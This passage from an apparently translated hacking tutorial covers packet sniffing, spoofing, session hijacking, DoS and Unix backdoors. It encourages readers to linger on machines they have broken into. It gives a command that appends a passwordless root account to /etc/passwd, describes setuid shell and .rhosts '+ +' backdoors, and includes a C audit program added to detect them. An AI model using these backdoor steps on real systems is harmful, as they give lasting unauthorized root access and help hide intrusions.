    Do you have to hack your way in all over again the next time you want onto B? No. That is what backdoors are for. A backdoor is a way of getting back into a system easily after you have hacked it. There are a great many kinds; the details are in section 6.5.

    5.7 And enjoy
    Run around as you like. Keep an eye on the administrators and treat the machine like your own. But do not damage the system; that is what crackers do. Quietly, quietly, without anyone noticing. Do not forget...


6. Other hacking techniques

    6.1 Packet sniffing

    A sniffer is a program that captures packets travelling on the network. Its original purpose was network debugging, but, just as a security tool is also a hacking tool, it was soon embraced by hackers. On a shared (hub or coaxial) Ethernet, when host A sends a packet to host B, the frame reaches every station on the segment. The host whose address matches picks it up, and the other hosts ignore it because it is not addressed to them. You can see where this is going: what if a host does not ignore those frames but processes them (puts its interface into promiscuous mode)? That is how sniffing was born. (On a switched network a port only sees its own traffic, so this simple form no longer works on its own.)

      -- TCP/IP LOG -- TM: Tue Feb 15 17:04:55 --
      PATH: salsari.org(1953) => jungmin.org(ftp)
      STAT: Sun Apr 14 18:09:23, 14 pkts, 49 bytes [TH_FIN]
      DATA: USER salsari
      :
      : PASS jungminlove
      :
      : CWD backup
      :
      : NLST
      :
      : QUIT
      : --


    6.2 Spoofing

    - IP spoofing
    Using a weakness in the TCP/IP protocol to impersonate the IP address of a host that the target trusts, and getting in that way, is called IP spoofing. The weakness was described in 1985 in Robert Morris's paper "A Weakness in the 4.2 BSD UNIX TCP/IP Software", and at the end of 1994 the famous hacker Kevin Mitnick put the theory into practice.

    > A quick aside!!
    R commands (rlogin, rsh, rcp)
    These commands consult $HOME/.rhosts (and /etc/hosts.equiv) on the target system and let a user from a listed host in without any password; you could call them the very embodiment of the trust relationship.

    - DNS spoofing
    Knock the DNS server out with a DoS attack, then feed the target host, which authenticates by host name, DNS answers that make it trust the hacker's host, and use rlogin, rsh and the like to get in.

    - Web spoofing
    Impersonating a target web site on the Web and stealing the information users enter.

    6.3 IP hijacking
    Watching an established TCP connection between two hosts and inserting yourself into the middle of it (by predicting the sequence numbers, one of TCP's weaknesses) is called hijacking. It can bypass the protection of one-time passwords such as S/Key and ticket-based authentication such as Kerberos, because the session is taken over after authentication has already happened.

    6.4 DoS
    DoS (Denial of Service) attacks deny service. Put simply, they make the target host's services (ftp, smtp, telnet....) unable to do their job. An attack like this is not much use to us, but what if an Internet service provider A is competing with provider B? Naturally you would pick the provider whose service works well and is fast. Now if a hacker hired by A hits B's systems with DoS.. B's service stops working properly.. users get annoyed.. and so users drift from B, whose service is bad, to A. With DoS the attacker is hard to identify as well. (Since spoofing is used, it is difficult to find out who is attacking the system.) Well.. that's the idea...
    DoS attacks include smurf, teardrop, ping flooding, syn flooding, mail bombs and countless others. They can take out a single service or wreck the whole system.

    6.5 Backdoors

    - Password-file backdoor

    > Looking at the password file :
    root:fVi3dx5Ytkdo:0:0:root:/:/bin/bash
    salsari:mKbj4T1sYji:501:100:salsari:/home/salsari:/bin/bash
    Each password entry has 7 fields.

    user name : password : user ID : group ID : full name : home directory : shell
    root : fVi3dx5Ytkdo : 0 : 0 : root : / : /bin/bash

    Oho~ easier than it looks.. Everyone.. you get it, right?
    So shall we plant a backdoor in the password file?
    Append the following to /etc/passwd (as root; nobody else can write to it).

    # echo "hacker::0:0:hacker:/:/bin/bash" >> /etc/passwd

    A user ID of 0 means root's privileges (the group ID is not what matters).
    So the user hacker has root's privileges and, with an empty password field, can log in without a password...
    A backdoor like this is easy to make, but also easy to spot. So instead you can bury the line somewhere in the middle of the file, or change the user ID and group ID of a rarely used account to 0:0. (On a system with shadow passwords the empty field has to go in /etc/shadow instead.)

    - .rhosts backdoor
    The Unix rsh and rlogin commands consult the .rhosts file in the home directory.
    Putting + + in .rhosts lets anyone, from any host, in without a password.
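    Auditing for the two account-level backdoors just described, as an added example that is not from the original article: audit_passwd flags any uid-0 entry other than root and any empty password field in passwd-format text, and audit_rhosts flags the "+" wildcards in .rhosts or hosts.equiv. The sample input is constructed from the two passwd lines above plus the planted hacker entry and one more; the flag names are my own.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum {
    F_EXTRA_UID0     = 1,   /* a uid 0 account that is not root */
    F_EMPTY_PASSWORD = 2,   /* empty password field: login with no password */
    F_BAD_FIELDS     = 4,   /* line does not have exactly 7 fields */
    F_RHOSTS_OPEN    = 8    /* "+" host or user wildcard in .rhosts */
};

/* Constructed sample: the article's two lines plus two planted entries. */
static const char SAMPLE_PASSWD[] =
    "root:fVi3dx5Ytkdo:0:0:root:/:/bin/bash\n"
    "salsari:mKbj4T1sYji:501:100:salsari:/home/salsari:/bin/bash\n"
    "hacker::0:0:hacker:/:/bin/bash\n"
    "guest:x:0:100:old guest account:/home/guest:/bin/sh\n";

/* Split one line on ':' in place without collapsing empty fields (strtok
 * would merge "::" and hide exactly the empty password we are looking for). */
static int split_fields(char *line, char *fields[], int max)
{
    int n = 0;
    char *p = line;
    while (n < max) {
        fields[n++] = p;
        p = strchr(p, ':');
        if (!p) break;
        *p++ = '\0';
    }
    return n;
}

/* Walk a text buffer line by line, handing each non-empty line (NUL-terminated,
 * in a private copy) to cb, and OR together what the callbacks return. */
static int for_each_line(const char *text, int (*cb)(char *line))
{
    int flags = 0;
    size_t len = strlen(text);
    char *copy = malloc(len + 1), *line, *nl;
    memcpy(copy, text, len + 1);
    for (line = copy; line && *line; line = nl) {
        nl = strchr(line, '\n');
        if (nl) *nl++ = '\0';
        if (*line) flags |= cb(line);
    }
    free(copy);
    return flags;
}

static int check_passwd_line(char *line)
{
    char *f[8];
    int flags = 0;
    if (split_fields(line, f, 8) != 7) return F_BAD_FIELDS;
    if (f[1][0] == '\0') flags |= F_EMPTY_PASSWORD;
    if (strcmp(f[2], "0") == 0 && strcmp(f[0], "root") != 0) flags |= F_EXTRA_UID0;
    return flags;
}

static int check_rhosts_line(char *line)
{
    char host[64] = "", user[64] = "";
    if (sscanf(line, "%63s %63s", host, user) < 1) return 0;
    return (strcmp(host, "+") == 0 || strcmp(user, "+") == 0) ? F_RHOSTS_OPEN : 0;
}

int audit_passwd(const char *text) { return for_each_line(text, check_passwd_line); }
int audit_rhosts(const char *text) { return for_each_line(text, check_rhosts_line); }

int main(void)
{
    int f = audit_passwd(SAMPLE_PASSWD);
    printf("passwd: extra uid0=%d empty password=%d bad lines=%d\n",
           !!(f & F_EXTRA_UID0), !!(f & F_EMPTY_PASSWORD), !!(f & F_BAD_FIELDS));
    printf(".rhosts \"+ +\": open=%d\n", !!(audit_rhosts("+ +\n") & F_RHOSTS_OPEN));
    return 0;
}
```

    Both checks are cheap enough to run from cron against /etc/passwd, /etc/hosts.equiv and every user's .rhosts; the "bury it in the middle of the file" trick the text mentions does not help the attacker against a scan that reads every line.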

    - setuid backdoor
    As explained in chapter 2, copy a shell, make it setuid and use it as the backdoor.

    -r-sr-xr-x 3 root root 88620 Jul 16 1997 /bin/hacker
    To set the mode, as root: chmod 4755 <filename>

    - TCP shell backdoor
    Open a shell port (TCP) by adding a service to inetd.conf and the services file, then connect to it.

    - UDP shell backdoor
    Packet filters of the time often let UDP through because of DNS. A UDP shell backdoor exploits that and can pass through such a firewall untouched. (A stateful firewall that only admits DNS replies to queries it has seen does not have this gap.)

    - Rootkit
    A package that installs backdoor programs (and trojaned system binaries to hide them) automatically.

    - Kernel backdoor
    Modifies the kernel itself to build the backdoor. An advanced technique; it is almost impossible to detect from within the running system.

    References
    internet hacking document
    security advisory
    8lgm advisory



